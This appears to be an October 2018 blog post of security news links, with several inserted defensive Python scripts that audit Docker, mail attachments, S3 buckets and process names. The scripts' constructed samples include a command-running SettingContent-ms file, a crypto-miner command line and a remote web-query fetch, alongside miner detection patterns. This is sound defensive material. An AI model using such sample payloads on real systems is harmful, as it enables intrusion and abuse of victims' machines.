Cyber Security October 2018

This posting is here to collect security alert news in October 2018.

I post links to security vulnerability news in the comments of this article.

You are also free to post related links.

495 Comments

  1. Tomi Engdahl says:

    Exposed Docker APIs Continue to Be Used for Cryptojacking
    https://www.bleepingcomputer.com/news/security/exposed-docker-apis-continue-to-be-used-for-cryptojacking/

    Exposed Docker APIs continue to be used by attackers to create new containers that perform cryptojacking.

    Earlier this year we reported on attackers utilizing insecure Docker and Kubernetes systems to deploy containers that were used to mine coins. For those who are not familiar with containers, they are packages that contain an application and all the dependencies that are required to run it. These packages can then be deployed as containers to Docker or Kubernetes systems as needed.

    Reply
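The attack pattern in the article above is an unauthenticated Docker Engine API reachable over TCP, which lets anyone who can reach the port create containers on the host. Below is an added example (not code from the article or from Docker) that audits both sides of that pattern: the daemon.json listener configuration, and a GET /containers/json listing for containers that look like miners or that bind-mount the host root. The daemon.json and container list are constructed samples; the miner indicator lists are hypothetical and not exhaustive.

```python
"""Audit a Docker host for the exposure pattern behind Docker-API cryptojacking:
an API listener reachable over TCP without TLS client verification, plus
attacker-created containers running a miner. Added example, not code from the
article; the daemon.json and /containers/json samples below are constructed."""
import json
import re

# Indicator strings for mining workloads (a hypothetical, non-exhaustive list).
MINER_IMAGE_RE = re.compile(r"xmrig|minerd|cpuminer|cryptonight|monero", re.I)
MINER_CMD_RE = re.compile(r"xmrig|minerd|stratum\+tcp://|--donate-level", re.I)


def daemon_api_exposure(daemon_json):
    """Findings for a dockerd daemon.json: TCP API listeners and whether they
    require client certificates (tlsverify). Without tlsverify, anyone who can
    reach the port can create containers as root on the host."""
    cfg = json.loads(daemon_json)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local-only
        addr = host[len("tcp://"):]
        if not cfg.get("tlsverify", False):
            findings.append("unauthenticated TCP API listener on " + addr)
        if addr.startswith(("0.0.0.0", "[::]", ":")):
            findings.append("TCP API listener bound to all interfaces: " + addr)
    return findings


def suspicious_containers(containers_json):
    """Flag entries from GET /containers/json whose image or command looks like
    a miner, or whose bind mounts expose the host root filesystem (a common
    follow-on to API abuse). Returns one record per flagged container."""
    flagged = []
    for c in json.loads(containers_json):
        reasons = []
        if MINER_IMAGE_RE.search(c.get("Image", "")):
            reasons.append("miner image")
        if MINER_CMD_RE.search(c.get("Command", "")):
            reasons.append("miner command")
        if any(m.get("Type") == "bind" and m.get("Source") == "/"
               for m in c.get("Mounts", [])):
            reasons.append("host root bind-mounted")
        if reasons:
            flagged.append({"id": c["Id"][:12], "image": c.get("Image", ""),
                            "reasons": reasons})
    return flagged


# Constructed samples: an exposed daemon, one benign container and one miner.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAMPLE_CONTAINERS_JSON = json.dumps([
    {"Id": "a1b2c3d4e5f60000", "Image": "nginx:1.15",
     "Command": "nginx -g 'daemon off;'", "Mounts": []},
    {"Id": "deadbeefcafe0000", "Image": "alpine:latest",
     "Command": "/tmp/xmrig -o stratum+tcp://pool.example:3333 --donate-level 1",
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}]},
])

if __name__ == "__main__":
    for finding in daemon_api_exposure(SAMPLE_DAEMON_JSON):
        print("daemon:", finding)
    for container in suspicious_containers(SAMPLE_CONTAINERS_JSON):
        print("container:", container)
```

On a real host the inputs are /etc/docker/daemon.json and the output of `curl -s http://HOST:2375/containers/json` (if that curl succeeds from another machine without a client certificate, the first finding already applies). Only tcp:// listeners are examined: the unix socket is local and protected by file permissions.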
  2. Tomi Engdahl says:

A flaw that enables spying has been found in Windows 10 – here is how to check whether your computer is safe
    https://www.is.fi/digitoday/tietoturva/art-2000005881077.html

    Reply
  3. Tomi Engdahl says:

    Security Tip (ST18-005)
    Proper Disposal of Electronic Devices
    https://www.us-cert.gov/ncas/tips/18-005

    Reply
  4. Tomi Engdahl says:

    Same Old yet Brand-new: New File Types Emerge in Malware Spam Attachments
    https://blog.trendmicro.com/trendlabs-security-intelligence/same-old-yet-brand-new-new-file-types-emerge-in-malware-spam-attachments/

    In our annual roundup report for 2017, we found that the most common file types used in malware-related spam campaigns are .XLS, .PDF, .JS, .VBS, .DOCX, .DOC, .WSF, .XLSX, .EXE, and .HTML. But cybercriminals are expanding the file types they abuse. The following details how cybercriminals make use of old file types in brand-new ways, proving that they are regularly experimenting to evade spam filters.

    .ARJ and .Z files

    .PDF Files

    .IQY Files

    .PUB

    SettingContents-ms

    Reply
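The file types listed above are abused in different ways: .IQY is a plain-text Excel web query whose URL Excel fetches on open, a .SettingContent-ms file is XML whose DeepLink element holds a command line that Windows runs, and .ARJ/.Z archives simply evade filters that only know .ZIP. The following added example (not code from the Trend Micro post) triages attachments of those types, extracting the URL or command so an analyst sees what the file would do. The sample attachments are constructed, the extension allow/block lists are assumptions, and the PDF check uses common active-content keywords rather than anything the post describes.

```python
"""Triage mail attachments for the file types the Trend Micro post names:
archives (.ARJ, .Z), Excel web queries (.IQY), Publisher (.PUB), Windows
SettingContent-ms shortcuts and PDFs. Added example, not the article's code;
the sample attachments below are constructed."""
import re
import xml.etree.ElementTree as ET

# Extensions that rarely arrive legitimately from outside (list is an assumption).
ARCHIVE_EXTS = {".arj", ".z"}
OFFICE_EXTS = {".pub"}
# PDF name objects that indicate active content (common indicators, not from the post).
PDF_ACTIVE_RE = re.compile(rb"/(JavaScript|JS|Launch|OpenAction|AA)\b")


def iqy_target(data):
    """An .IQY web query is a text file: first line 'WEB', then a URL line.
    Excel fetches that URL when the file is opened. Return the URL or None."""
    lines = data.decode("utf-8", "replace").splitlines()
    if not lines or lines[0].strip().upper() != "WEB":
        return None
    for line in lines[1:]:
        candidate = line.strip()
        if re.match(r"https?://", candidate, re.I):
            return candidate
    return None


def settingcontent_deeplink(data):
    """A .SettingContent-ms file is XML whose <DeepLink> element holds a command
    line that Windows executes when the shortcut is opened. Return it or None."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return None
    for el in root.iter():
        # strip any {namespace} prefix before comparing the tag name
        if el.tag.rsplit("}", 1)[-1] == "DeepLink" and el.text:
            return el.text.strip()
    return None


def assess_attachment(name, data):
    """Return (verdict, detail) for one attachment: 'block', 'review' or 'allow'."""
    m = re.search(r"\.([^.]+)$", name.lower())
    ext = "." + m.group(1) if m else ""
    if ext in ARCHIVE_EXTS:
        return "block", "uncommon archive type " + ext
    if ext == ".iqy":
        url = iqy_target(data)
        return ("block", "web query fetches " + url) if url else ("review", "malformed IQY")
    if ext == ".settingcontent-ms":
        cmd = settingcontent_deeplink(data)
        return ("block", "DeepLink runs: " + cmd) if cmd else ("review", "no DeepLink")
    if ext in OFFICE_EXTS:
        return "review", "Publisher file (macro-capable)"
    if ext == ".pdf":
        hit = PDF_ACTIVE_RE.search(data)
        return ("review", "PDF contains /" + hit.group(1).decode()) if hit else ("allow", "static PDF")
    return "allow", "no rule for " + ext


# Constructed attachments exercising each rule (not real samples).
SAMPLE_ATTACHMENTS = {
    "invoice.iqy": b"WEB\r\n1\r\nhttp://203.0.113.10/invoice.dat\r\n",
    "open-me.SettingContent-ms": (
        b'<?xml version="1.0" encoding="UTF-8"?>\n'
        b'<PCSettings><SearchableContent '
        b'xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">'
        b'<ApplicationInformation><AppID>windows.immersivecontrolpanel_cw5n1h2txyewy'
        b'!microsoft.windows.immersivecontrolpanel</AppID>'
        b'<DeepLink>%windir%\\system32\\cmd.exe /c calc.exe</DeepLink>'
        b'</ApplicationInformation></SearchableContent></PCSettings>'),
    "photos.arj": b"\x60\xea" + b"\x00" * 8,
    "report.pdf": b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n",
    "notes.docx": b"PK\x03\x04" + b"\x00" * 8,
}

if __name__ == "__main__":
    for filename, content in SAMPLE_ATTACHMENTS.items():
        print(filename, *assess_attachment(filename, content))
```

The point of parsing rather than blocking by extension alone is the detail string: the fetched URL or the DeepLink command is what goes into the ticket and into network blocklists. Renamed files defeat extension matching, so in production the type should also be confirmed from content (the IQY and SettingContent parsers already do that for their formats).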
  5. Tomi Engdahl says:

    Cathay Pacific Suffers World’s Largest Airline Data Breach
    https://www.pandasecurity.com/mediacenter/news/cathay-pacific-data-breach/

    Cathay Pacific, Hong Kong’s flag carrier, announced that they’d discovered a cyber-breach affecting millions of their customers.

    The sensitive information of nearly 10 million people might have been accessed by cybercriminals. According to the Asian airline operator, hackers might have stolen personal records that include name; nationality; date of birth; phone number; passport number; credit card numbers; email; address; customer service remarks and historical travel information. According to CNN Business, the data leak included approximately 860,000 passport numbers and roughly 250,000 identity card numbers. Cathay might be based in Asia but serves multiple countries across four continents, and the victims include US residents.

    Reply
  6. Tomi Engdahl says:

    Google Launches reCAPTCHA v3
    https://www.securityweek.com/google-launches-recaptcha-v3

    Google on Monday announced the launch of reCAPTCHA v3, which aims to improve user experience by removing the need for challenges.

    reCAPTCHA is the security service provided by Google for protecting websites from spam and abuse. reCAPTCHA v1 asked every user to read a distorted text and enter it into a box. The second version has brought significant improvements as it leverages various other types of data to determine if a request comes from a bot or a human, allowing many users to access content simply by ticking a box.

    With reCAPTCHA v3, Google is making user experience even more frictionless by running adaptive risk analysis in the background and providing a score that tells website owners how suspicious an interaction is.

    Reply
  7. Tomi Engdahl says:

    US Election Integrity Depends on Security-Challenged Firms
    https://www.securityweek.com/us-election-integrity-depends-security-challenged-firms

It was the kind of security lapse that gives election officials nightmares. In 2017, a private contractor left data on Chicago’s 1.8 million registered voters — including addresses, birth dates and partial Social Security numbers — publicly exposed for months on an Amazon cloud server.

Later, at a tense hearing, Chicago’s Board of Elections dressed down the top three executives of Election Systems & Software, the nation’s dominant supplier of election equipment and services.

    The three shifted uneasily on folding chairs as board members grilled them about what went wrong. ES&S CEO Tom Burt apologized and repeatedly stressed that there was no evidence hackers downloaded the data.

    The Chicago lapse provided a rare moment of public accountability for the closely held businesses that have come to serve as front-line guardians of U.S. election security.

    A trio of companies — ES&S of Omaha, Nebraska; Dominion Voting Systems of Denver and Hart InterCivic of Austin, Texas — sell and service more than 90 percent of the machinery on which votes are cast and results tabulated. Experts say they have long skimped on security in favor of convenience, making it more difficult to detect intrusions such as occurred in Russia’s 2016 election meddling.

    Reply
  8. Tomi Engdahl says:

    X.Org Flaw Exposes Unix-Like OSes to Attacks
    https://www.securityweek.com/xorg-flaw-exposes-unix-oses-attacks

    Several Unix-like operating systems are affected by a potentially serious X.Org vulnerability that can be exploited for privilege escalation and arbitrary code execution

    Narendra Shinde discovered that X.Org X Server versions 1.19 and later are affected by an arbitrary file overwrite vulnerability that can be exploited by an authenticated attacker to elevate permissions and execute arbitrary code with root privileges.

    The security hole, tracked as CVE-2018-14665, was introduced nearly two years ago and it affects operating systems that run X Server with elevated privileges.

    “Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is running with elevated privileges (ie when Xorg is installed with the setuid bit set and started by a non-root user),” X.Org developers said in an advisory.

    Reply
  9. Tomi Engdahl says:

    Logical Bug in Microsoft Word’s ‘Online Video’ Allows Code Execution
    https://www.securityweek.com/logical-bug-microsoft-words-online-video-allows-code-execution

    Microsoft Office is impacted by a logical bug that allows an attacker to abuse the “online video” feature in Word to execute malicious code, Cymulate security researchers warn.

    The issue, which supposedly impacts all users of Office 2016 and older, can be exploited without special configuration, the security researchers say. Furthermore, no security warning is presented to the user when a malicious document abusing the flaw is opened.

    Reply
  10. Tomi Engdahl says:

    McAfee says cloud security not as bad as we feared… it’s much worse
    Quick takeaway: most everyone sucks at IaaS
    https://www.theregister.co.uk/2018/10/30/mcafee_cloud_security_terrible/

    The average business has around 14 improperly configured IaaS instances running at any given time and roughly one in every 20 AWS S3 buckets are left wide open to the public internet.

    Reply
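An S3 bucket ends up "wide open" through one of two mechanisms: a bucket ACL grant to the AllUsers or AuthenticatedUsers group, or a bucket policy Allow statement whose Principal is everyone. The added example below (not McAfee's tooling) evaluates both from the documents an account returns and combines them into one verdict. The ACL and policy documents are constructed; on a real account they come from the boto3 calls s3.get_bucket_acl(Bucket=b) and s3.get_bucket_policy(Bucket=b)['Policy'].

```python
"""Decide whether an S3 bucket is exposed to the public internet from its
ACL and bucket policy, the two mechanisms behind the 'wide open' buckets
McAfee counted. Added example, not McAfee's tooling; the ACL and policy
documents below are constructed."""
import json

# Grantee URIs that mean "everyone" in an S3 ACL.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return (group, permission) pairs granted to AllUsers/AuthenticatedUsers."""
    out = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            out.append((grantee["URI"].rsplit("/", 1)[-1], grant["Permission"]))
    return out


def principal_is_everyone(principal):
    """True for Principal "*" and for {"AWS": "*"} in either string or list form."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = aws if isinstance(aws, list) else [aws]
        return "*" in aws
    return False


def public_policy_statements(policy_json):
    """Return (sid, actions, conditional) for Allow statements open to everyone.
    Unconditional ones are public outright; conditional ones still need review,
    because conditions such as aws:Referer are trivially spoofed by a client."""
    out = []
    for st in json.loads(policy_json).get("Statement", []):
        if st.get("Effect") != "Allow" or not principal_is_everyone(st.get("Principal")):
            continue
        actions = st.get("Action", [])
        actions = actions if isinstance(actions, list) else [actions]
        out.append((st.get("Sid", ""), actions, bool(st.get("Condition"))))
    return out


def bucket_exposure(acl, policy_json):
    """Combine both checks into one verdict: 'public', 'review' or 'private'."""
    if public_acl_grants(acl):
        return "public"
    stmts = public_policy_statements(policy_json) if policy_json else []
    if any(not conditional for _, _, conditional in stmts):
        return "public"
    return "review" if stmts else "private"


# Constructed inputs: an owner-only ACL, an ACL that lets anyone list the
# bucket, one unconditional public-read statement and one referer-gated one.
OWNER_GRANT = {"Grantee": {"Type": "CanonicalUser", "ID": "example-owner"},
               "Permission": "FULL_CONTROL"}
PRIVATE_ACL = {"Owner": {"ID": "example-owner"}, "Grants": [OWNER_GRANT]}
SAMPLE_ACL = {"Owner": {"ID": "example-owner"}, "Grants": [
    OWNER_GRANT,
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]}
PUBLIC_READ_STMT = {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                    "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}
REFERER_STMT = {"Sid": "RefererOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
                "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*",
                "Condition": {"StringLike": {"aws:Referer": "https://www.example.com/*"}}}
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17",
                            "Statement": [PUBLIC_READ_STMT, REFERER_STMT]})
REFERER_ONLY_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [REFERER_STMT]})

if __name__ == "__main__":
    print("acl grants:", public_acl_grants(SAMPLE_ACL))
    print("policy:", public_policy_statements(SAMPLE_POLICY))
    print("verdict:", bucket_exposure(SAMPLE_ACL, SAMPLE_POLICY))
```

Note that a bucket with no policy raises NoSuchBucketPolicy from get_bucket_policy; treat that as an empty policy (pass None), not as an error. Object-level ACLs can expose individual keys even when the bucket passes this check, so a full audit also samples object ACLs.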
  11. Tomi Engdahl says:

    Strengthening Industry Collaboration Through the Charter of Trust for a Secure Digital World
    https://securityintelligence.com/strengthening-industry-collaboration-through-the-charter-of-trust-for-a-secure-digital-world/

    Cybersecurity awareness month wraps up this week in Europe and the U.S., and it’s the perfect time to reiterate that digital transformation will only succeed if people and organizations can rely on the security of data and connected systems. Digitization and cybersecurity must progress in close association.

    Security providers are responsible not only for innovating and implementing solutions, but also for building digital trust. Earlier this year, we saw the start of an initiative with great potential to make our digital world more secure and increase trust. This Charter of Trust brings together companies and players from a variety of industries to work with governments to “establish a reliable basis upon which confidence in a networked, digital world can take root and grow.”

    Reply
  12. Tomi Engdahl says:

    Feds Expand Security Researchers’ Ability To Hack Without Going To Jail
    https://yro.slashdot.org/story/18/10/29/236237/feds-expand-security-researchers-ability-to-hack-without-going-to-jail?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot%2Fto+%28%28Title%29Slashdot+%28rdf%29%29

    Friday, the Librarian of Congress and U.S. Copyright Office renewed several key exemptions (and added a few new ones) to the Digital Millennium Copyright Act. This go round, they’ve extended some essential exemptions ensuring that computer security researchers won’t be treated like nefarious criminals for their contributions to society.

    Feds Expand Security Researchers’ Ability to Hack Without Going to Jail
    https://motherboard.vice.com/en_us/article/pa9jbg/feds-expand-security-researchers-ability-to-hack-without-going-to-jail

    “No researcher wants to end up in jail for discovering a vulnerability.”

    Reply
  13. Tomi Engdahl says:

    Demand for cryptocurrency skills surges, but lacks cyber security expertise
    http://www.itpro.co.uk/business-strategy/careers-training/32230/demand-for-cryptocurrency-skills-surges-but-lacks-cyber

    Trend Micro warns the lack of cybersecurity skills in cryptocurrency environments could be dangerous for firms

    Demand for skills in cryptocurrencies is growing, but security expertise isn’t keeping up, leaving businesses open to attack, a report by Trend Micro has revealed.

    In the cryptocurrency world, businesses are seeking employees with a knowledge of blockchain, finance, Java, bitcoin and Javascript, but crucially missing from the list is cybersecurity knowledge.

    Reply
  14. Tomi Engdahl says:

    Civil servant who watched porn at work blamed for infecting a US government network with malware
    https://techcrunch.com/2018/10/29/porn-sites-blamed-after-government-network-infected-malware/

    A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.

    The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.

    Investigators found that his Android cell phone “was also infected with malware.”

    The findings were made public in a report earlier this month but buried on the U.S. government’s oversight website and went largely unreported.

    Reply
  15. Tomi Engdahl says:

    Jimmy Kimmel Live
    https://m.youtube.com/watch?feature=youtu.be&v=UzvPP6_LRHc

    as a service to the public we asked people passing by our theater today what password they use to protect their personal information. Did they tell us? Watch to find out!

    Reply
  16. Tomi Engdahl says:

    The Masquerade Ball: Train Yourself to Detect Spoofed Files
    https://www.tripwire.com/state-of-security/security-data-protection/masquerade-train-yourself-detect-spoofed-files/

    Masquerading is a technique used in which a file name is maliciously named something similar to one which may be trusted.

    This specific technique is outlined in detail in the MITRE ATT&CK framework, as well. For example, a file named explorer.exe may seem more benign than one called explor3r.exe.

    Reply
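Two checks catch most masquerading of the explorer.exe / explor3r.exe kind: a known system binary name running from the wrong directory, and an unknown name that is within a small edit distance of a known one after undoing common digit-for-letter substitutions. The added example below (not the Tripwire article's code) runs both over process-creation events. The allow-list of binaries and their expected directories is a deliberately small illustrative subset, and the "pid,image_path" event lines are constructed.

```python
"""Detect masqueraded process names of the kind the Tripwire post describes
(explorer.exe vs explor3r.exe) in process-creation events. Added example,
not the article's code; the allow-list of system binaries and the sample
events are constructed and deliberately small."""
import ntpath

# Known Windows binaries and the directory they are expected to run from
# (illustrative subset; a real allow-list would be much longer).
KNOWN_BINARIES = {
    "explorer.exe": r"c:\windows",
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
}
# Characters attackers swap in for look-alike letters in file names.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "|": "l"})
MAX_DISTANCE = 2  # edit distance at which an unknown name counts as a look-alike


def levenshtein(a, b):
    """Classic edit distance; inputs are short, so the full table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_image_path(image_path):
    """Return a finding string for one executable path, or None if it looks legitimate."""
    directory, name = ntpath.split(image_path.lower())
    if name in KNOWN_BINARIES:
        expected = KNOWN_BINARIES[name]
        if directory != expected:
            return f"{name} running from {directory} (expected {expected}): {image_path}"
        return None
    normalized = name.translate(HOMOGLYPHS)
    for known in KNOWN_BINARIES:
        if normalized == known or levenshtein(name, known) <= MAX_DISTANCE:
            return f"look-alike of {known}: {image_path}"
    return None


def scan_events(lines):
    """Run the check over 'pid,image_path' event lines (a constructed format)
    and return (pid, finding) pairs."""
    findings = []
    for line in lines:
        pid, image_path = line.strip().split(",", 1)
        finding = check_image_path(image_path)
        if finding:
            findings.append((int(pid), finding))
    return findings


# Constructed events: two legitimate system processes, a digit-swapped
# explorer, a svchost started from Downloads, csrss, and a transposed svchost.
SAMPLE_EVENTS = [
    r"412,C:\Windows\explorer.exe",
    r"808,C:\Windows\System32\svchost.exe",
    r"4120,C:\Users\alice\AppData\Local\Temp\explor3r.exe",
    r"4133,C:\Users\alice\Downloads\svchost.exe",
    r"620,C:\Windows\System32\csrss.exe",
    r"4150,C:\ProgramData\scvhost.exe",
]

if __name__ == "__main__":
    for pid, finding in scan_events(SAMPLE_EVENTS):
        print(pid, finding)
```

Keeping every legitimate near-neighbour (csrss.exe beside lsass.exe, for instance) in the allow-list matters: an unknown name is compared against all known ones, so a legitimate binary missing from the list would be reported as a look-alike of whichever entry it resembles.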
  17. Tomi Engdahl says:

    EU: Leak reveals states are ready to put human rights defenders at risk to protect surveillance industry
    https://rsf.org/en/news/eu-leak-reveals-states-are-ready-put-human-rights-defenders-risk-protect-surveillance-industry

    October 29, 2018
    EU member states must back proposed curbs on the export of surveillance equipment to abusive regimes, Access Now, Amnesty International, and Reporters Without Borders said, after leaked documents revealed that several EU countries, particularly Sweden and Finland, are pushing for weakening human rights protections in relation to European export controls of surveillance technology. The leaked documents were published earlier today by digital rights reporters at netzpolitik.org and Reporters Without Borders.

    Reply
  18. Tomi Engdahl says:

    Privacy group calls on U.S. government to adopt universal AI guidelines to protect safety, security and civil liberties
    https://techcrunch.com/2018/10/29/us-government-universal-artificial-intelligence-guidelines/?sr_share=facebook&utm_source=tcfbpage

    After months of work, a set of guidelines designed to protect humanity from a range of threats posed by artificial intelligence have been proposed.

    Now, a privacy group wants the U.S. government to adopt them too.

    The set of 12 universal guidelines revealed at a meeting in Brussels last week are designed to “inform and improve the design and use of AI” by maximizing the benefits while reducing the risks. AI has been for years a blanket term for machine-based decision making, but as the technology gets better and are more widely adopted, the results of AI-based outcomes are having a greater effect on human lives — from gaining credit, employment, and even to criminal sentencing.

    Reply
  19. Tomi Engdahl says:

    Radisson Hotel Group ‘fesses up to ‘security incident’
    Loyalty card members deets exposed
    https://www.theregister.co.uk/2018/10/31/radisson_hotel_group_fesses_up_to_security_incident/

    Radisson Hotel Group has told members of its loyalty scheme that their personal details were exposed in a data breach.

    The mail sent by the group stated:

    This data security incident did not compromise any credit card or password information. Our ongoing investigation has determined that the information accessed was restricted to member name, address (including country of residence), email address, and in some cases, company name, phone number, Radisson Rewards member number and any frequent flier numbers on file.

    The breach affected a “small percentage” of the Radisson Rewards members, the email stated, but didn’t provide any specifics about numbers.

    Reply
  20. Tomi Engdahl says:

    The Linux Kernel’s Speck Death Sentence Finally Being Carried Out
    https://www.phoronix.com/scan.php?page=news_item&px=Linux-Kernel-Die-Speck-Die

    Earlier this year the Speck encryption algorithm was added to the Linux kernel as at the time Google intended to use it for EXT4/fscrypt file-system encryption with low-end Android devices. But Speck with all its controversy due to being developed by the US National Security Agency (NSA) led to immediate backlash. The removal of Speck from the Linux kernel tree is finally happening.

    Google decided in August they wouldn’t use Speck as planned but rather work on the new HPolyC crypto code for use in future Android Go devices. Following that was the call to remove Speck from the Linux kernel with no real users of the code, but that didn’t happen for the Linux 4.19 cycle.

    Reply
  21. Tomi Engdahl says:

    GitHub lost a network link for 43 seconds, went TITSUP for a day
    Database replication is hard
    https://www.theregister.co.uk/2018/10/31/github_lost_a_network_link_for_43_seconds_went_titsup_for_a_day/

    A 43-second loss of connectivity on the US East Coast helped trigger GitHub’s 24-hour TITSUP (Total Inability To Support User Pulls) earlier this month.

    The bit bucket today published a detailed analysis of the outage, and explained that the brief loss of connectivity between its US East Coast network hub and the primary US East Coast data centre left it with an inconsistency between two MySQL databases.

    The TITSUP began with planned maintenance work, GitHub’s head of technology Jason Warner explained, to “replace failing 100G optical equipment”.

    Reply
  22. Tomi Engdahl says:

    50 ways to leave your lover, but four to sniff browser history
    Vulnerabilities that expose browsing history yet to be fixed
    https://www.theregister.co.uk/2018/10/31/web_browsers_privacy/

    “History sniffing” promises a nose full of dust or, if you’re talking about web browsers, a whiff of the websites you’ve visited.

    Reply
  23. Tomi Engdahl says:

    Pain in the brain! Kaspersky warns of hackable brain implants
    That furious clicking you hear is Charlie Brooker frantically writing his next script
    https://www.theregister.co.uk/2018/10/29/hacked_brain_implants/

    Reply
  25. Tomi Engdahl says:

    The Google Home Hub is deeply insecure
    https://techcrunch.com/2018/10/31/the-google-home-hub-is-deeply-insecure/?sr_share=facebook&utm_source=tcfbpage

    Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

    The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant.

    Reply
  26. Tomi Engdahl says:

    Salvador Rodriguez / CNBC:
    Facebook says it will move Workplace by Facebook, its Slack rival, to its own domain in 2019, Workplace.com, to appease businesses’ fears about data security — Workplace by Facebook, the company’s enterprise business, is moving onto a website domain separate from Facebook.com in an effort …

    Facebook is separating Workplace from the main Facebook site to appease business customers concerned about security
    https://www.cnbc.com/2018/10/31/facebook-introduces-workplace-domain-to-calm-enterprise-security-fears.html

    Workplace by Facebook, the company’s enterprise business, is moving onto a website domain separate from Facebook.com in an effort to build trust with customers and build its brand.
    The Workplace by Facebook unit informed Walmart, a top customer, of the domain change the day Facebook disclosed a security breach that impacted millions of consumers.
    Workplace by Facebook expects to begin using the new domain for its customers in 2019.

    Reply
  27. Tomi Engdahl says:

    Zack Whittaker / TechCrunch:
    Audit finds a US Geological Survey network in South Dakota was infected with malware after an unnamed employee visited thousands of porn pages on his laptop

    Civil servant who watched porn at work blamed for infecting a US government network with malware
    https://techcrunch.com/2018/10/29/porn-sites-blamed-after-government-network-infected-malware/

    A U.S. government network was infected with malware thanks to one employee’s “extensive history” of watching porn on his work computer, investigators have found.

    The audit, carried out by the U.S. Department of the Interior’s inspector general, found that a U.S. Geological Survey (USGS) network at the EROS Center, a satellite imaging facility in South Dakota, was infected after an unnamed employee visited thousands of porn pages that contained malware, which downloaded to his laptop and “exploited the USGS’ network.” Investigators found that many of the porn images were “subsequently saved to an unauthorized USB device and personal Android cell phone,” which was connected to the employee’s government-issued computer.

    Investigators found that his Android cell phone “was also infected with malware.”

    Reply
  28. Tomi Engdahl says:

    Return of the Ping of Death

    Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)
    https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

    This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

    The following operating system versions and devices are vulnerable:

    Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
    Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
    Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
    Apple OS X El Capitan and earlier: all devices

    Reply
  30. Tomi Engdahl says:

    Check this out: Radisson Hotel Group ‘fesses up to ‘security incident’
    Loyalty card members deets exposed
    https://www.theregister.co.uk/2018/10/31/radisson_hotel_group_fesses_up_to_security_incident/

    Reply
  31. Tomi Engdahl says:

    Telegram Desktop Saves Conversations Locally in Plain Text
    https://www.bleepingcomputer.com/news/security/telegram-desktop-saves-conversations-locally-in-plain-text/

    The desktop variant for Telegram secure messaging app fails to protect chat content locally and offers access to plain text conversations and media that otherwise travel encrypted.

    Telegram’s focus on providing secure communication is well known. The app uses encryption to ensure that a third party cannot read the conversations on their way to the destination.

    A feature called ‘secret chats’ is available for those that want complete privacy for their communication, by using end-to-end encryption to guarantee that only the sender and the receiver can access the contents.

    Reply
  32. Tomi Engdahl says:

    Complete Works Of Shakespeare Hidden Inside Twitter Thumbnail Image
    https://www.bleepingcomputer.com/news/security/complete-works-of-shakespeare-hidden-inside-twitter-thumbnail-image/

    A security researcher has demonstrated how he could hide the Complete Works of Shakespeare into an image and use Twitter to distribute it using Steganography.

    Steganography is the act of hiding information or messages inside objects that are not themselves secret. This allows people to covertly distribute messages, files, and other types of data in files or data that appear to be non-secretive in nature.

    In a recent experiment, security researcher David Buchanan created a JPEG image of Shakespeare that also included a RARed copy of his complete works in HTML format. Buchanan went on to further show that this image could also be uploaded to Twitter, which would create a thumbnail that continued to contain the embedded RAR file.

    Reply
